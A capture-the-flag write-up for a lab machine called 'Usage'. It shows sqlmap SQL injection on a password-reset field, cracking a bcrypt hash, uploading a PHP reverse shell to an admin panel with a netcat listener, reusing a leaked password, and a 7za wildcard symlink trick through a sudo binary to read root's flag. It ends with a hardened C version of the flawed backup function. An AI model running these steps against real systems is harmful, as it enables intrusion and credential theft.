# Usage (Easy)

## Enumeration

As usual let's start with an nmap scan:

```
Nmap scan report for 10.10.11.18
Host is up, received syn-ack (0.089s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```

We see SSH and HTTP, so let's add `10.10.11.18    usage.htb` to our hosts file and take a look at the website.

<figure><img src="/files/AqOWDE38RXAgupc44PDD" alt=""><figcaption><p>Main page of the website</p></figcaption></figure>

We see that we can register, log in, or visit the admin section, which takes us to `admin.usage.htb`; we also need to add that to our hosts file and check it later.

After I made an account and logged in, there were only some short articles on the website, with no useful information.

<figure><img src="/files/yX51CEAgnZR5SiT9qeID" alt=""><figcaption><p>Dashboard after logging in</p></figcaption></figure>

So I went to look at the admin website, but it only had a login form and there was nothing I could do to bypass it, so I decided to go back to the main website and test for SQL injection, since I hadn't tested it for that yet.

Now, trying `/forget-password`, we see that when we send a single `'` we get a server error:

<figure><img src="/files/ezSzUNhDV1tXK8BQ3943" alt=""><figcaption><p>Error from the single quotation</p></figcaption></figure>

This indicates we might be able to do some SQL injection, so I fired SQLmap at it. I intercepted the request with Burp, saved it to a file called `forget-password.req` and used the following command:

## Exploitation

```sh
sqlmap -r forget-password.req -p email --batch --risk 3 --level 5 --dbs
```

This took a while, but we found a boolean-based blind injection in the email field, and sqlmap retrieved the databases present on the system:

```
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog
```

Now let's enumerate the `usage_blog` database and see what we can get from it.

```sh
sqlmap -r forget-password.req -p email --batch --risk 3 --level 4 -D usage_blog --tables
```

That retrieves the tables in the DB, one of which is `admin_users`, which probably holds passwords, so let's dump it using:

```sh
sqlmap -r forget-password.req -p email --risk 3 --level 5 --batch -D usage_blog -T admin_users --dump
```

And we get a username of "admin" and his password hash! The `$2y$` prefix tells us it's bcrypt, hence hashcat mode 3200. Let's start cracking.

```sh
hashcat -m 3200 hash.file /opt/wordlists/rockyou.txt
```

```sh
hashcat -m 3200 hash.file --show
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2:whatever1
```

Let's try logging in to that admin site we found earlier:

<figure><img src="/files/WbYMOHCx2Febi0LT9LrB" alt=""><figcaption><p>Admin site</p></figcaption></figure>

Wandering around a little, we see in the profile that we can upload a profile picture, so let's try uploading a quick reverse shell:

<figure><img src="/files/1XOvcF0TeqtFWPhwAe13" alt=""><figcaption><p>Uploading a shell via burp</p></figcaption></figure>

So we changed the file extension to `.php` and the MIME type to `application/php`, with the content of `shell.php` as the body. Submitting the request and then refreshing the profile page, we see a new picture.

<figure><img src="/files/WizWrBrAsNIFQfhVuj9e" alt=""><figcaption><p>Uploaded shell</p></figcaption></figure>

Opening that file (via the link of the uploaded image) we get a callback on our listener and a shell as the dash user:

```sh
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.18] 35340
bash: cannot set terminal process group (1243): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ 
```

## Privilege Escalation

Enumerating a little, we see there is another user called "xander", and we find a password in `/home/dash/.monitrc`; trying it for that user, we succeed.

```
dash@usage:~$ cat .monitrc 
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd
<SNIP>
```

And now we have a shell as xander. Let's see what sudo privileges we have:

```
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management

```

So we see this is an executable file; we download it to our box and check it in Ghidra, where the interesting part is the `backupWebContent` function:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Decompiled from /usr/bin/usage_management, which xander can run as root via sudo. */
void backupWebContent(void)
{
  int iVar1;

  iVar1 = chdir("/var/www/html");
  if (iVar1 == 0) {
    /* The shell expands '*', so every file name in the web root becomes a 7za argument. */
    system("/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *");
  }
  else {
    perror("Error changing working directory to /var/www/html");
  }
  return;
}
```

This is a chance to abuse the shell wildcard in that `system()` call; here is a [reference](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----a35a29ea730d--------------------------------) from HackTricks.

So we create an empty file whose name starts with an `@` sign, and make a symbolic link with the rest of that name pointing to the file we want to read. When the shell expands `*`, 7z receives `@root.txt` and treats it as "read the list of files to archive from `root.txt`"; since `root.txt` is our symlink to `/root/root.txt`, it reads the flag as a file name, finds no file with that name, and prints it in the warning that there are no more files to process.

```
xander@usage:/var/www/html$ touch @root.txt
xander@usage:/var/www/html$ ln -s /root/root.txt root.txt
xander@usage:/var/www/html$ sudo /usr/bin/usage_management 
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

<SNIP>

Scan WARNINGS for files and folders:

7c5b992<REDACTED>a764d : No more files
```

And we get our flag :D For shell access, you can read root's SSH key the same way.
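For comparison, here is how I would harden `backupWebContent` (an added example, not the real binary's code): the shell wildcard is gone, every entry is passed as `./name` so 7za can never read it as an `@` list file or a switch, and `execv()` replaces `system()`. It assumes the caller enumerates `/var/www/html` with `readdir()` and passes the names in; `safe_path_arg`, `build_7za_argv` and `backup_web_content` are names I made up.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Prefix an entry name with "./" so 7za sees a plain path that can never start with
 * '@' (list file) or '-' (switch). Rejects ".", "..", empty names and names with '/'. */
int safe_path_arg(const char *name, char *out, size_t outlen) {
    if (!name[0] || !strcmp(name, ".") || !strcmp(name, "..") || strchr(name, '/')) return -1;
    return snprintf(out, outlen, "./%s", name) < (int)outlen ? 0 : -1;
}

static char *dupstr(const char *s) {   /* strdup() without needing POSIX feature macros */
    size_t n = strlen(s) + 1; char *p = malloc(n);
    return p ? memcpy(p, s, n) : NULL;
}

/* Build 7za's argv from an explicit list of entry names (what readdir() returns).
 * No shell, no glob: names are data, never interpreted. Unsafe names are skipped. */
int build_7za_argv(const char **names, size_t n, char ***argv_out) {
    static const char *fixed[] = { "/usr/bin/7za", "a", "/var/backups/project.zip",
                                   "-tzip", "-snl", "-mmt", "--" };
    size_t nfixed = sizeof fixed / sizeof fixed[0];
    char **argv = calloc(nfixed + n + 1, sizeof *argv);
    if (!argv) return -1;
    int argc = 0;
    for (size_t i = 0; i < nfixed; i++) argv[argc++] = dupstr(fixed[i]);
    for (size_t i = 0; i < n; i++) {
        char buf[4096];
        if (safe_path_arg(names[i], buf, sizeof buf) == 0) argv[argc++] = dupstr(buf);
    }
    argv[argc] = NULL;
    *argv_out = argv;
    return argc;
}

/* Hardened backupWebContent(): chdir() then execv() the fixed argv instead of
 * system() with a shell wildcard. Returns 7za's exit status, or -1 on failure. */
int backup_web_content(const char *webroot, const char **names, size_t n) {
    char **argv;
    if (build_7za_argv(names, n, &argv) < 0) return -1;
    pid_t pid = fork();
    if (pid == 0) {                     /* child: never returns on success */
        if (chdir(webroot) == 0) execv(argv[0], argv);
        _exit(127);
    }
    int status = -1; if (pid > 0) waitpid(pid, &status, 0);
    for (char **p = argv; *p; p++) free(*p);
    free(argv);
    return (pid > 0 && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
}
```

Note that `-snl` (store symlinks as links) was already there, which is why the symlink alone leaked nothing: it was the `@` list-file parsing of the wildcard-expanded name that read through it, so the real fix is to stop handing user-controlled names to the shell and to keep the web root unwritable by the user allowed to run the tool.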

That's it for the box!

Happy hacking :) :vampire:
